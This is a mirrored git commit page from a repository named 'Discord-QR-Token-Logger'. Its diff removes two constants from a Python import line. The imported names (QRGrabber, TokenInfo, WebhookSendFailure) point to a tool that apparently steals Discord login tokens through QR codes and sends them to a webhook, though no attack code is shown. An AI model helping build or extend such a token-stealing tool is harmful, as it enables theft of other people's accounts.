mirror of
https://github.com/9P9/Discord-QR-Token-Logger.git
synced 2025-10-20 07:39:25 +00:00
Removed the NO and YES
This commit is contained in:
@@ -30,7 +30,7 @@ from pystyle import Box, Center, Colorate, Colors, System, Write
|
||||
from selenium import webdriver
|
||||
from selenium.common.exceptions import WebDriverException
|
||||
from selenium.webdriver.chrome.service import Service
|
||||
from constants import BANNER, NO, PYSTRAY_IMG, YES, SLEEP_TIME
|
||||
from constants import BANNER, PYSTRAY_IMG, SLEEP_TIME
|
||||
from discord_token import QRGrabber, TokenInfo
|
||||
from exceptions import InvalidToken, QRCodeNotFound, WebhookSendFailure
|
||||
from queue import Queue
|
||||
|
Reference in New Issue
Block a user